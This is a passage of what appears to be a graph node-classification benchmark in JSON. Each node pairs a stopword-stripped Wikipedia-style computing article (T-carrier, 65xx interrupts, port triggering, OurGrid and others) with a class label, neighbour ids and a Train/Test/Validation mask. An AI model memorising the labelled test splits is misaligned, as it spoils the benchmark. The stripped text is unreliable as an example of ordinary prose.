pocs abused receivers automate spam reporting different degrees push button see message run tool automatically quarantines reports messages recognizes spam specific tools available receivers report abuse hand forward spammy message attachment—so include whole header—and send chosen authority mailbox providers also use tools automatically process incidents notifications",
    "neighbors": [
      8224,
      1667,
      2276,
      6762,
      1899,
      8202,
      7949,
      8204,
      8747,
      4272,
      914,
      4883,
      5012,
      10578,
      1495,
      4793,
      8093
    ],
    "mask": "None"
  },
  {
    "node_id": 3146,
    "label": 1,
    "text": "Truth_discovery:truth discovery truth discovery also known truth finding process choosing actual true value data item different data sources provide conflicting information several algorithms proposed tackle problem ranging simple methods like majority voting complex ones able estimate trustworthiness data sources truth discovery problems divided two sub-classes single-truth multi-truth first case one true value allowed data item e.g birthday person capital city country second case multiple true values allowed e.g cast movie authors book typically truth discovery last step data integration pipeline schemas different data sources unified records referring data item detected abundance data available web makes probable find different sources provide partially completely different values data item together fact increasing reliance data derive important decisions motivates need developing good truth discovery algorithms many currently available methods rely voting strategy define true value data item nevertheless recent studies shown rely majority voting could get wrong results even 30 data items solution problem assess trustworthiness sources give importance votes coming trusted sources ideally supervised learning techniques could exploited assign reliability score sources hand-crafted labeling provided values unfortunately feasible since number needed labeled examples proportional number sources many applications number sources prohibitive single-truth multi-truth discovery two different problems single-truth discovery characterized following properties multi-truth case following properties hold multi-truth discovery unique features make problem complex taken consideration developing truth-discovery solutions examples point main differences two methods knowing examples truth provided source 1 single truth case first table say sources 2 3 oppose truth result provide wrong values hand second case second table sources 2 3 neither correct erroneous instead provide subset true values time oppose truth vast majority truth discovery methods based voting approach source votes value certain data item end value highest vote select true one sophisticated methods votes weight data sources importance indeed given votes coming trusted sources source trustworthiness usually known priori estimated iterative approach step truth discovery algorithm trustworthiness score data source refined improving assessment true values turn leads better estimation trustworthiness sources process usually ends values reach convergence state source trustworthiness based different metrics accuracy provided values copying values sources domain coverage detecting copying behaviors important fact copy allows spread false values easily making truth discovery hard since many sources would vote wrong values usually systems decrease weight votes associated copied values even ’ count currently available truth discovery methods designed work well single-truth case reported characteristics relevant typologies single-truth methods different systems model source trustworthiness majority voting simplest method popular value selected true one majority voting commonly used baseline assessing performances complex methods methods estimate source trustworthiness exploiting similar technique one used measure authority web pages based web links vote assigned value computed sum trustworthiness sources provide particular value trustworthiness source computed sum votes assigned values source provides methods estimate source trustworthiness using similarity measures typically used information retrieval source trustworthiness computed cosine similarity similarity measures set values provided source set values considered true either selected probabilistic way obtained ground truth methods use bayesian inference define probability value true conditioned values provided sources formula_1 formula_2 value provided data item formula_3 formula_4 set observed values provided sources specific data item trustworthiness source computed based accuracy values provides complex methods exploit bayesian inference detect copying behaviors use insights better assess source trustworthiness due complexity less attention devoted study multi-truth discovery reported two typologies multi-truth methods characteristics methods use bayesian inference define probability group values true conditioned values provided data sources case since could multiple true values data item sources provide multiple values single data item possible consider values individually alternative consider mappings relations set provided values sources providing trustworthiness source computed based accuracy values provides sophisticated methods also consider domain coverage copying behaviors better estimate source trustworthiness methods use probabilistic graphical models automatically define set true values given data item also assess source quality without need supervision many real-world applications benefit use truth discovery algorithms typical domains application include healthcare crowd/social sensing crowdsourcing aggregation information extraction knowledge base construction truth discovery algorithms could also used revolutionize way web pages ranked search engines going form current methods based link analysis like pagerank procedures rank web pages based accuracy information provide",
    "neighbors": [
      6784,
      7180,
      2901,
      10102
    ],
    "mask": "Test"
  },
  {
    "node_id": 3147,
    "label": 2,
    "text": "Granular_Linux:granular linux granular granular linux linux distribution targeted common desktop users granular based pclinuxos comes installable live cd cd version granular features two desktop environments kde development version enlightenment kde full-featured desktop environment enlightenment lightweight desktop shell markedly faster kde granular roots india granular linux project kicked october 2006 first demonstration given college students first release made available download 30 december 2006 main idea behind birth project redefine application set included pclinuxos extent introduce idea one major desktop environment single livecd latter idea implemented beginning second version release granular version 0.25 two desktop environments kde xfce included kde highly customizable feature-rich resource heavy xfce light-weight yet feature-full desktop environment v0.25 came v0.90 finally v1.0 granular 1.0 code name esto vox last esto series first 0.90 esto vello october 2007 special dvd edition granular 0.90 released name funworks featured lg3d desktop environment along three others host many software games granular utilizes pclinuxos repository well software/package management granular repository opened march 2008 since source granular-specific rpm packages available pclinuxos repository granular comes livecd means n't install try standard cd version granular includes two desktop environments kde enlightenment 17 like pclinuxos granular uses synaptic package manager gui frontend apt package management installing updating removing packages granular comes perl-based script mklivecd makes possible remaster granular create backup cd/dvd installed system also included granular startpoint html-based acts primer various major software included granular beginning news website launched 5 december domain http //www.granular-linux.com/main/ later main website shifted another server new domain name present website address http //www.granularlinux.com/ later main website migrated http //linux.granularproject.org/",
    "neighbors": [
      8837,
      8582,
      7435,
      10127,
      2321,
      5397,
      4887,
      10394,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      7983,
      2738,
      4790,
      439,
      56,
      8119,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      8907,
      1110,
      9693,
      2914,
      6371,
      10084,
      485,
      3685,
      5096,
      4841,
      6890,
      7913,
      7020,
      9064,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      10860,
      9461,
      6393,
      11388,
      8957,
      1150
    ],
    "mask": "Test"
  },
  {
    "node_id": 3148,
    "label": 2,
    "text": "Supervisory_program:supervisory program supervisory program supervisor computer program usually part operating system controls execution routines regulates work scheduling input/output operations error actions similar functions regulates flow work data processing system also refer program allocates computer component space schedules computer events task queuing system interrupts control system returned supervisory program frequently enough ensure demands system met historically term essentially associated ibm line mainframe operating systems starting os/360 operating systems supervisor generally called kernel 1970s ibm abstracted supervisor state hardware resulting hypervisor enabled full virtualization i.e capacity run multiple operating systems machine totally independently hence first system called virtual machine vm",
    "neighbors": [
      7983,
      2224,
      5457,
      7217,
      3323,
      3359
    ],
    "mask": "Test"
  },
  {
    "node_id": 3149,
    "label": 5,
    "text": "Emergency_Stand_Alone:emergency stand alone emergency stand alone esa term used vendors telephone equipment nortel dms-100 lucent 5ess gtd-5 typically small towns communities telephone services provided remote switching unit controlled powerful host switching complex esa occurs host/remote links severed thus leaving region “ community isolation ” esa mode town/community limited receiving placing calls within community/town larger towns/regions may several remote switching units required “ backdoor trunking ” connect remote units esa within town/community special translations implemented allow 911 redirected local number local police station fire hall resides within community/town",
    "neighbors": [
      11286
    ],
    "mask": "Test"
  },
  {
    "node_id": 3150,
    "label": 4,
    "text": "Port_triggering:port triggering port triggering configuration option nat-enabled router controls communication internal external host machines ip network similar port forwarding enables incoming traffic forwarded specific internal host machine although forwarded port open permanently target internal host machine chosen dynamically two networks communicate nat-router host machines internal network behave ip address nat-router perspective host machines external network without traffic forwarding rules impossible host machine external network host b open connection host machine internal network host connection targeted ip nat-router since internal network hidden behind nat port triggering host opens connection host b using predefined port ports incoming traffic router receives predefined port ports forwarded host 'triggering event forwarding rule forwarding rule disabled period inactivity port triggering useful network applications client server roles must switched certain tasks authentication irc chat file downloading ftp file sharing example port triggering operates connecting irc internet relay chat common authenticate username ident protocol via port 113 connecting irc client computer typically makes outgoing connection port 6667 port range 6660–7000 causing irc server attempt verify username given making new connection back client computer port 113 computer behind nat nat silently drops connection know computer behind nat send request connect two transport-level connections necessary application-level connection irc server succeed see internet protocol suite since second tcp/ip connection possible attempted connection irc server fail case port triggering router configured outbound connection established port 6660 7000 allow inbound connections particular computer port 113 gives flexibility static port forwarding necessary set specific address network allowing multiple clients connect irc servers nat-router security also gained sense inbound port left open actively use port triggering disadvantage binds triggered port single client time long port bound particular client port triggering effectively unavailable clients ftp file sharing example means two clients download files ftp server running active mode simultaneously irc even though authentication step happens quickly port triggering timeout may still prevent clients logging irc servers port triggering unsuitable servers behind nat router relies local computer make outgoing connection receive incoming ones routers possible one client use port triggering port forwarding simultaneously",
    "neighbors": [
      7364,
      1164,
      3792,
      8308,
      5531
    ],
    "mask": "Test"
  },
  {
    "node_id": 3151,
    "label": 4,
    "text": "System_integrity:system integrity telecommunications term system integrity following meanings",
    "neighbors": [
      7983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3152,
    "label": 2,
    "text": "BlackBerry_World:blackberry world blackberry world previously blackberry app world application distribution service application blackberry limited majority blackberry devices service provides blackberry users environment browse download update third-party applications service went live april 1 2009 three major app stores different operating systems largest revenue per app 9,166.67 compared 6,480.00 1,200.00 apple app store google play respectively 21 january 2013 blackberry announced rebranded blackberry app world simpler blackberry world part release blackberry 10 operating system blackberry devices since 2015 release blackberry priv longer use blackberry 10 operating system android instead uses google play store blackberry world set shut 2019 2003 rim launched mobile data service enable customers access java-based third-party enterprise applications using secure real-time push-based blackberry infrastructure later october 21 2008 rim announced blackberry developer conference company would open application store devices also announced store scheduled open march 2009 would work conjunction paypal services january 19 2009 rim began accepting submissions applications developers march 4 2009 rim officially named store blackberry app world previously called blackberry application storefront also confirmed service would initially available desktops web-based catalog would accessible non-blackberry devices april 1 2009 ctia trade show rim announced app world gone live blackberry sponsored wireless symposium announced average one million apps downloaded day august 19 2010 blackberry app world 2.0 released new version introduced blackberry id single sign account system used blackberry client blackberry app world desktop storefront addition blackberry id blackberry app world 2.0 also introduced direct credit card billing carrier billing wireless subscribers december 3 2010 research motion announced daily downloads two million apps per day february 2 2011 blackberry app world 2.1 released version introduced in-app purchases digital goods allowing add-ons purchased within applications january 21 2013 blackberry rebranded blackberry app world blackberry world june 18 2014 blackberry announced official relationship amazon includes access amazon appstore blackberry 10.3 december 5 2017 blackberry announced closure blackberry world december 31 2019 april 1 2018 blackberry removed paid apps blackberry world beginning 2011 16,000 apps available blackberry app world year later app store passed 60,000 apps january 2012 month later 70,000 apps february 2012 blackberry jam september 2012 rim announced app world 105,000 apps may 2013 blackberry live conference blackberry announced 120,000 apps blackberry 10 available download blackberry world application verification done blackberry world apps content quality agreed launch 85 percent verification done denpasar bali rim announced store would initially available united states united kingdom canada march 2013 blackberry world available 170 markets supports 23 currencies 33 languages 6 million applications downloaded daily aggregate 4 billion downloads to-date accepts payment markets using combination paypal credit card carrier billing list countries blackberry world available applications free paid 0.99 599.99 usd u.s registration app submission fees charged developers currently 0 service available english french italian german spanish brazilian portuguese store available following blackberry devices updated blackberry os version 4.5.0 higher users initially allowed archive apps microsd emmc storage certain blackberry smartphone models archive function later removed release app world 3.0 2010 rim announced several new tools make easier applications developers build simulate deploy monetize feature-rich applications blackberry platform including blackberry enterprise application development platform next generation blackberry web application platform blackberry webworks platform blackberry playbook™ tablet blackberry smartphones blackberry payment service blackberry push service blackberry advertising service location service maps services analytics service scoreloop bbm social platform software developer kits et al blackberry embraced open standards included variety open source libraries box including lua openal cocos2d-x box2d open source repository accessed github.com/blackberry open ecosystem helps developers target multiple platforms partnerships appcelerator apache cordova dojo jquery mobile marmalade nme qt sencha touch blackberry changed whole direction development tools mainly embracing c++/cascades native road develop mobile apps blackberry 10 platform html5 considered almost-native second path development april 2014 blackberry announced stop support adobe air release blackberry 10.3.1 released later 2014 time release blackberry 10.3.1 possible upload new adobe air-based apps blackberry world",
    "neighbors": [
      10368,
      9101,
      9358,
      10900,
      410,
      10270,
      2208,
      9508,
      7722,
      5677,
      9262,
      7983,
      7857,
      1083,
      9408,
      5067,
      2892,
      4951,
      8413,
      9311,
      231,
      9063,
      3949,
      9341,
      6271
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3153,
    "label": 3,
    "text": "Redundant_array_of_independent_memory:redundant array independent memory redundant array independent memory raim design feature found certain computers main random access memory raim utilizes additional memory modules striping algorithms protect failure particular module keep memory system operating continuously raim similar concept redundant array independent disks raid protects failure disk drive case memory supports several dram device chipkills entire memory channel failures raim much robust parity checking ecc memory technologies protect many varieties memory failures july 22 2010 ibm introduced first high end computer server featuring raim zenterprise 196 z196 machine contains 3 tb usable raim-protected main memory 2011 business class model z114 introduced also supporting raim formal announcement letter offered additional information regarding implementation",
    "neighbors": [
      6033,
      3323,
      8233
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3154,
    "label": 4,
    "text": "Laurence_Hugh_Frost:laurence hugh frost laurence hugh frost july 22 1902 – may 23 1977 rear admiral united states navy served director naval intelligence director national security agency frost graduated united states naval academy 1926 served various ships shore stations throughout 1920s 1930s commanding officer destroyer attacked german u-boat 4 september 1941 first attack germany united states warship world war ii occurred united states officially neutral three months america entered war decorated service world war ii frost assigned naval intelligence later saw combat commander cruiser korean war chief staff commander first fleet 1952 commanded destroyer flotilla four united states atlantic fleet 1955–1956 director naval intelligence 1956 1960 head naval intelligence tried change united states policy rebellion indonesia frost became director national security agency nsa november 1960 rank vice admiral held post 1962 holding posts beginning space race frost involved early decisions promote surveillance satellites navy elint program effort reduce tensions soon arrival nsa frost appointed robert f. rinehart chairman national security agency scientific advisory board specifically newest member board months experience fewer pre-acquired biases rinehart words according nsa 1962 vice admiral laurence frost unexpectedly transferred position gordon blake replacement final tour duty potomac river naval command frost retired 1964 papers preserved operational archives branch naval historical center washington d.c.. listed rear admiral john f. kennedy presidential library holds 11-page transcription oral interview gave 1970. portions remain closed career frost awarded navy distinguished service medal silver star one gold award star legion merit one gold award star combat v",
    "neighbors": [
      6017,
      8726,
      1189,
      9517,
      1838,
      5308,
      1986,
      6343,
      6344,
      11335,
      7119,
      7759,
      7887,
      8276,
      7893,
      991,
      7137,
      3305,
      7145,
      2419,
      6005,
      6136,
      766
    ],
    "mask": "None"
  },
  {
    "node_id": 3155,
    "label": 4,
    "text": "Julia_Ward:julia ward julia ward december 1900 – june 18 1962 founder central reference division national security agency nsa inducted cryptologic hall honor 2002 ward received a.b bryn mawr college 1923 ph.d bryn mawr college 1940 ward joined cryptologic service wwii worked signal security agency army cryptologic organization also worked librarian eventually built collection classified unclassified materials use analysts 1945 became deputy chief reference section within years turned section one known poorly organized section widely recognized highly respected 1949 ward named head collateral branch thereby becoming female branch head office operations 1955 ward promoted deputy chief nsa liaison foreign operations section ward inducted nsa cryptologic hall honor june 2002 national cryptologic museum baltimore md bryn mawr college plaque commemorate placement hall honor",
    "neighbors": [
      7887
    ],
    "mask": "Test"
  },
  {
    "node_id": 3156,
    "label": 5,
    "text": "T-carrier:t-carrier t-carrier member series carrier systems developed bell laboratories digital transmission multiplexed telephone calls first version transmission system 1 t1 introduced 1962 bell system could transmit 24 telephone calls simultaneously single transmission line copper wire subsequent specifications carried multiples basic t1 1.544 mbit/s data rates t2 6.312 mbit/s 96 channels t3 44.736 mbit/s 672 channels others t-carrier hardware specification carrying multiple time-division multiplexed tdm telecommunications channels single four-wire transmission circuit developed bell laboratories ca 1957 first employed 1962 long-haul pulse-code modulation pcm digital voice transmission d1 channel bank t-carriers commonly used trunking switching centers telephone network including private branch exchange pbx interconnect points uses twisted pair copper wire analog trunks used employing one pair transmitting another pair receiving signal repeaters may used extended distance requirements digital t-carrier system carrier wave systems 12-channel carrier systems worked frequency division multiplexing call analog signal t1 trunk could transmit 24 telephone calls time used digital carrier signal called digital signal 1 ds-1 ds-1 communications protocol multiplexing bitstreams 24 telephone calls along two special bits framing bit frame synchronization maintenance-signaling bit t1 maximum data transmission rate 1.544 megabits per second europe rest world except japan standardized e-carrier system similar transmission system higher capacity directly compatible t-carrier existing frequency-division multiplexing carrier systems worked well connections distant cities required expensive modulators demodulators filters every voice channel connections within metropolitan areas bell labs late 1950s sought cheaper terminal equipment pulse-code modulation allowed sharing coder decoder among several voice trunks method chosen t1 system introduced local use 1961 later decades cost digital electronics declined point individual codec per voice channel became commonplace advantages digital transmission become entrenched common legacy system line rate speeds t1 means data circuit runs original 1.544 mbit/s line rate originally t1 format carried 24 pulse-code modulated time-division multiplexed speech signals encoded 64 kbit/s streams leaving 8 kbit/s framing information facilitates synchronization demultiplexing receiver t2 t3 circuit channels carry multiple t1 channels multiplexed resulting transmission rates 6.312 44.736 mbit/s respectively t3 line comprises 28 t1 lines operating total signaling rate 1.544 mbit/s possible get fractional t3 line meaning t3 line 28 lines turned resulting slower transfer rate typically reduced cost supposedly 1.544 mbit/s rate chosen tests done long lines chicago conducted underground test site typical bell system outside plant time accommodate loading coils cable vault manholes physically apart determined repeater spacing optimum bit rate chosen empirically—the capacity increased failure rate unacceptable reduced leave margin companding allowed acceptable audio performance seven bits per pcm sample original t1/d1 system later d3 d4 channel banks extended frame format allowing eight bits per sample reduced seven every sixth sample frame one bit robbed signaling state channel standard allow zero sample would produce long string binary zeros cause repeaters lose bit sync however carrying data switched 56 could long strings zeros one bit per sample set 1 jam bit 7 leaving 7 bits × 8,000 frames per second data detailed understanding rate 1.544 mbit/s divided channels follows explanation glosses t1 voice communications deals mainly numbers involved given telephone system nominal voiceband including guardband 4,000 hz required digital sampling rate 8,000 hz see nyquist rate since t1 frame contains 1 byte voice data 24 channels system needs 8,000 frames per second maintain 24 simultaneous voice channels frame t1 193 bits length 24 channels × 8 bits per channel 1 framing bit 193 bits 8,000 frames per second multiplied 193 bits yield transfer rate 1.544 mbit/s 8,000 × 193 1,544,000 initially t1 used alternate mark inversion ami reduce frequency bandwidth eliminate dc component signal later b8zs became common practice ami mark pulse opposite polarity previous one space level zero resulting three level signal however carried binary data similar british 23 channel systems 1.536 megabaud 1970s equipped ternary signal repeaters anticipation using 3b2t 4b3t code increase number voice channels future 1980s systems merely replaced european standard ones american t-carriers could work ami b8zs mode ami b8zs signal allowed simple error rate measurement bank central office could detect bit wrong polarity bipolarity violation sound alarm later systems could count number violations reframes otherwise measure signal quality allow sophisticated alarm indication signal system decision use 193-bit frame made 1958 allow identification information bits within frame two alternatives considered assign one extra bit b additional eight bits per frame 8-bit choice cleaner resulting 200-bit frame twenty-five 8-bit channels 24 traffic one 8-bit channel available operations administration maintenance oa chose single bit per frame reduce required bit rate 1.544 vs 1.6 mbit/s marketing worried 8 bits chosen oa function someone would try sell voice channel wind nothing soon commercial success t1 1962 t1 engineering team realized mistake one bit serve increasing demand housekeeping functions petitioned management change 8-bit framing flatly turned would make installed systems obsolete hindsight ten years later cept chose eight bits framing european e1 although feared extra channel sometimes appropriated voice data 1970s bell labs developed higher rate systems t1c sophisticated modulation scheme carried 3 mbit/s balanced pair cables could support t-2 carried 6.312 mbit/s requiring special low-capacitance cable foam insulation standard picturephone t-4 t-5 used coaxial cables similar old l-carriers used long lines td microwave radio relay systems also fitted high rate modems allow carry ds1 signal portion fm spectrum poor quality voice service later carried ds3 ds4 signals 1980s companies rlh industries inc. developed t1 optical fiber industry soon developed evolved multiplexed t1 transmission schemes ds1 signals interconnected typically central office locations common metallic cross-connect point known dsx-1 ds1 transported metallic outside plant cable signal travels conditioned cable pairs known t1 span t1 span +-130 volts dc power superimposed associated four wire cable pairs line span power line repeaters t1 niu t1 smartjacks t1 span repeaters typically engineered apart depending cable gauge 36 db loss requiring repeated span cable bridge taps load coils across pairs t1 copper spans replaced optical transport systems copper metallic span used t1 typically carried hdsl encoded copper line four wire hdsl require many repeaters conventional t1 spans newer two wire hdsl hdsl-2 equipment transports full 1.544 mbit/s t1 single copper wire pair approximately twelve thousand 12,000 feet 3.5 km 24 gauge cable used hdsl-2 employ multiple repeaters conventional four wire hdsl newer hdsl-4 systems one advantage hdsl ability operate limited number bridge taps tap closer hdsl transceiver two four wire hdsl equipment transmits receives cable wire pair compared conventional t1 service utilizes individual cable pairs transmit receive ds3 signals rare except within buildings used interconnections intermediate step multiplexed onto sonet circuit t3 circuit go repeaters customer orders ds3 usually receives sonet circuit run building multiplexer mounted utility box ds3 delivered familiar form two coax cables 1 send 1 receive bnc connectors ends twelve ds1 frames make single t1 superframe t1 sf t1 superframe composed two signaling frames t1 ds0 channels employ in-band signaling eighth bit written robbed full 64 kbit/s ds0 payload either logical zero one bit signify circuit signaling state condition hence robbed bit signaling restrict ds0 channel rate 56 kbit/s two twelve ds1 frames make t1 sf framed circuit t1 sf framed circuits yield two independent signaling channels b t1 esf framed circuits four signaling frames twenty four frame extended frame format yield four independent signaling channels b c 56 kbit/s ds0 channels associated digital data service dds services typically utilize eighth bit ds0 voice circuits employ b band signaling one exception switched 56kbit/s dds dds bit eight used identify dte request send rts condition switched 56 dds bit eight pulsed alternately set logical zero one transmit two state dial pulse signaling information sw56 dds csu/dsu digital end office switch use robbed-bit signaling america decreased significantly result signaling system 7 ss7 inter-office dial trunks ss7 full 64 kbit/s ds0 channel available use connection allows 64 kbit/s 128 kbit/s isdn data calls exist switched trunk network connection supporting t1 carrier entity optioned b8zs clear channel capable carriers price ds1 lines many different ways however boil two simple components local loop cost local incumbent charges transport signal end user central office otherwise known co point presence otherwise known pop carrier port cost access telephone network internet carrier network typically port price based upon access speed yearly commitment level loop based geography farther co pop loop costs loop price several components built including mileage calculation performed v/h coordinates standard gps coordinates telco piece local bell operating company—namely verizon inc. qwest—charge t-carriers different price per mile rates therefore price calculation two distance steps geomapping determination local price arrangements carriers utilize geographic pricing model described competitive local exchange carriers clecs telepacific integra telecom tw telecom windstream level 3 communications xo communications offer national pricing ds1 pricing model provider charges price every geography services national pricing outgrowth increased competition t-carrier market space commoditization t-carrier products providers adopted national pricing strategy may experience widely varying margins suppliers bell operating companies e.g. verizon inc. qwest maintain geographic pricing models albeit wholesale prices voice ds1 lines calculation mostly except port required internet access replaced ldu otherwise known long distance usage price loop determined voice-related charges added total short total price loop ldu x minutes used",
    "neighbors": [
      8192,
      6529,
      10626,
      4227,
      7815,
      7049,
      6290,
      1437,
      1955,
      5162,
      3115,
      2860,
      2989,
      11181,
      2994,
      7490,
      7108,
      2894,
      10833,
      3168,
      2787,
      4963,
      1893,
      8811,
      4590,
      7799
    ],
    "mask": "Test"
  },
  {
    "node_id": 3157,
    "label": 3,
    "text": "Interrupts_in_65xx_processors:interrupts 65xx processors 65xx family microprocessors consisting mos technology 6502 derivatives wdc 65c02 wdc 65c802 wdc 65c816 csg 65ce02 handle interrupts similar fashion three hardware interrupt signals common 65xx processors one software interrupt instruction wdc 65c816 adds fourth hardware interrupt— useful implementing virtual memory architectures—and software interrupt instruction also present 65c802 intended use system coprocessor type e.g. floating point processor hardware interrupt signals active low follows detection signal causes processor enter system initialization period six clock cycles sets interrupt request disable flag status register loads program counter values stored processor initialization vector – commencing execution operating native mode 65c816/65c802 switched back emulation mode stay returned native mode software control detection signal well execution instruction cause overall sequence events order behavior 65c816 asserted differs respects description separately discussed note processor push accumulator index registers stack—code interrupt handler must perform task well restore registers termination interrupt processing necessary also note vector eight bit 65xx processors well 65c802/65c816 operating emulation mode operating native mode 65c802/65c816 provide separate vectors set interrupt request disable flag bit status register disable detection signal effect interrupts however see section instruction implemented wdc cmos processors additionally 65 c 02 65c816/65c802 operating emulation mode copy status register pushed stack flag set software interrupt cause interrupt cleared cause hence interrupt service routine must retrieve copy saved status register pushed onto stack check status flag order distinguish requirement eliminated operating 65c802/65c816 native mode due separate vectors two interrupt types 65c816 interrupt input intended provide means redirect program execution hardware exception detected page fault memory access violation hence processor response input asserted negated different and/or asserted also achieving correct operation response requires interrupt occur proper time machine cycle whereas requirement exists asserted valid memory cycle processor asserted and/or status outputs following sequence events occur address pushed stack aborted instruction rather contents program counter executing return interrupt following interrupt cause processor return aborted instruction rather next instruction would case interrupts order processor correctly respond abort system logic must assert negate input soon valid address placed bus determined address constitutes page fault memory access violation anomaly e.g. attempted execution privileged instruction hence logic must assert processor asserted signals also must remain asserted fall phase-two clock immediately released timing constraints observed abort interrupt handler may aborted causing registers and/or memory changed possibly-undefined manner nmos 6502 derivatives e.g. 6510 simultaneous assertion hardware interrupt line execution accounted design—the instruction ignored case also status decimal mode flag processor status register unchanged following interrupt kind behavior potentially result difficult locate bug interrupt handler decimal mode happens enabled time interrupt anomalies corrected cmos versions processor well-designed succinct interrupt handler interrupt service routine isr expeditiously service event causes interrupt without interfering way interrupted foreground task—the isr must transparent interrupted task although exceptions may apply specialized cases means isr must preserve microprocessor mpu state disturb anything memory supposed disturb additionally isr fully reentrant meaning two interrupts arrive close succession isr able resume processing first interrupt second one serviced reentrancy achieved using mpu hardware stack storage preserving mpu state means isr must assure whatever values mpu registers time interrupt isr terminates part preservation process automatically handled mpu acknowledges interrupt push program counter program bank 65c816/65c802 status register stack prior executing isr completion isr instruction executed mpu reverse process member 65xx family pushes registers stack isrs accumulator and/or index registers must preserved assure transparency later restored final steps prior executing case 65c816/65c802 consideration must given whether operated emulation native mode time interrupt latter may also necessary preserve data bank direct zero page registers guarantee transparency also 65c816 native mode operating system may well use different stack location application software means isr would preserve subsequently restore stack pointer complicating matters 65c816/65c802 sizes accumulator index registers may either 8 16 bits operating native mode requiring sizes preserved later restoration methods mpu state preserved restored within isr vary different versions 65xx family nmos processors e.g. 6502 6510 8502 etc one method accumulator index registers preserved accumulator pushed pulled stack therefore following isr entry code typical instruction necessary previously noted nmos versions 6502 clear decimal mode flag status register interrupt occurs accumulator index registers preserved isr use needed isr concluded work would restore registers resume interrupted foreground task following nmos code typical consequence instruction mpu return decimal mode state time interrupt 65c02 65c816/65c802 operating emulation mode require less code able push pull index registers without using accumulator intermediary also automatically clear decimal mode executing isr following typical upon finishing isr would reverse process previously stated little complexity 65c816/65c802 operating native mode due variable register sizes necessity accounting registers case index registers may pushed without regard sizes changing sizes automatically sets significant byte msb registers zero data lost pushed value restored provided index registers size pushed accumulator however really two registers designated pushing accumulator set 8 bits preserve could result loss transparency isr change way therefore accumulator must always set 16 bits pushed pulled isr using also efficient set index registers 16 bits pushing otherwise isr push extra copy status register restore register sizes prior pulling stack isrs following entry code achieve goal transparency code fragment symbol mos technology wdc standard assembly language syntax bitwise operand isr assigned stack location preservation stack pointer must occur memory pushes occurred—it apparent following code added sequence would handle requirement completion isr processes would reversed follows note upon executing 65c816/65c802 automatically restore register sizes interrupt occurred since pulling previously–saved status register sets clears register size bits time interrupt possible switch 65c816/65c802 native mode emulation mode within isr fraught peril addition forcing accumulator index registers 8 bits causing loss significant byte index registers entering emulation mode truncate stack pointer 8 bits relocate stack page 1 ram result stack existed time interrupt inaccessible unless also page 1 ram larger 256 bytes general mode switching servicing interrupt recommended procedure may necessary specific operating environments previously noted software interrupts may used variety ways implement system functions historical use assist patching proms bugs discovered system firmware typical technique often used firmware development arrange vector point unprogrammed patch area prom event bug discovered patching would accomplished blowing fuses address faulty instruction located thus changing instruction opcode upon executing resulting mpu would redirected patch area suitable patch code would written often patch area code started sniffing stack determine address bug encountered potentially allowing presence one patch prom use prom patching diminished eproms eeproms became commonly available another use software development debugging aid conjunction machine language monitor overwriting opcode directing hardware vector entry point monitor one cause program halt desired point allowing monitor take control time one may examine memory view processor register values patch code etc debugging advocated kuckes thompson facilitated liberally sprinkling one code instructions opcode replaced instructions without altering actual behaviour program debugged characteristic instructions processor treats either two byte instruction opcode following byte referred signature upon execution processor add two program counter prior pushing stack hence return interrupt executed interrupted program continue address immediately following signature used debugging device program counter may adjusted point signature order execution resume expected alternatively may inserted signature placeholder case program counter adjustment required fact double-increment program counter pushing stack facilitates technique treating supervisor call instructions found mainframe computers usual procedure treat signature operating system service index operating system handler would retrieve value program counter pushed stack decrement read resulting memory location get signature converting signature zero-based index simple lookup table consulted load program counter address proper service routine upon completion service routine instruction would used return control program made operating system call note signature may value whereas signature limited range use and/or request operating system service means user applications know entry address operating system function correct signature byte invoke desired operation hence relocation operating system memory break compatibility existing user applications also executing always vectors processor address simple code may used preserve registers stack prior turning control requested service however programming model result somewhat slower execution compared calling service subroutine primarily result stack activity occurs interrupt also interrupt requests disabled executing requiring operating system re-enable wait interrupt opcode instruction available wdc version 65c02 65c816/65c802 microprocessors mpu halts mpu places semi-catatonic state hardware interrupt kind occurs primary use low-power embedded systems mpu nothing expected event occurs minimal power consumption desired system waiting quick response required typical example code would make use follows code fragment mpu halt upon execution go low power consumption state despite interrupt requests irq disabled prior instruction mpu respond hardware interrupt waiting upon receipt interrupt mpu awaken one clock cycle resume execution instruction immediately following hence interrupt latency short 70 nanoseconds 14 megahertz resulting rapid response possible external event similar ways stop opcode instruction completely shuts mpu waiting single interrupt input executed mpu halts internal clock retain data registers enters low power state mpu brought state pulling reset input pin classified interrupt input low execution resume address stored locations hardware reset vector intended use low power embedded applications long periods time may elapse events require mpu attention processing required would used normal programming would result total cessation processing",
    "neighbors": [
      11395,
      1029,
      9739,
      6415,
      10767,
      664,
      5529,
      3615,
      8352,
      4385,
      10784,
      10786,
      7589,
      10533,
      3630,
      11054,
      5823,
      3010,
      8143,
      5457,
      6485,
      10969,
      477,
      10333,
      5862,
      6639,
      1776,
      5617,
      7281,
      7282,
      372,
      7284,
      10351,
      1660
    ],
    "mask": "Train"
  },
  {
    "node_id": 3158,
    "label": 7,
    "text": "OurGrid:ourgrid ourgrid opensource grid middleware based peer-to-peer architecture ourgrid mainly developed federal university campina grande brazil run ourgrid instance named ourgrid since december 2004 anyone freely easily join gain access large amount computational power run parallel applications computational power provided idle resources participants shared way makes contribute get need currently platform used run application whose tasks i.e parts run single machine communicate among execution like simulations data mining searching figure 1.1 ourgrid main components ourgrid broker originally called mygrid scheduling component ourgrid solution machine running broker called home machine central point grid processing jobs acts grid coordinator scheduling execution tasks necessary data transfer grid machines due central role grid configuration management well job specification done home machine broker ourgrid user frontend provides support describe execute monitor jobs job processing done machines running ourgrid workers execution job broker gets workers on-demand associated peer broker role schedule tasks run workers deploy retrieve data to/from workers execution tasks ourgrid peer runs machine called peer machine main role peer organize provide worker machines belong administrative domain user perspective peer worker provider i.e. network service dynamically provides workers task execution administrative point view peer determines machines used workers ourgrid worker component runs machine available task execution worker provides necessary access functionality home machine also provides basic support instrumentation fault handling furthermore combined ourgrid peer allows use machines private networks practice computer connected internet used worker machine even lies different administrative domain behind firewall figure 1.1 administrative domains possibly using intranets illustrated rectangles containing workers encourage resource contribution network ourgrid uses resource allocation mechanism called network favours network favours autonomous reputation scheme rewards peers contribute way incentive peer contribute much possible system ourgrid community peer-to-peer resource sharing system focused providing resources bot applications central mission ourgrid community sharing done using network favours model model peer offers access idle resources community return work exceeds local capacity 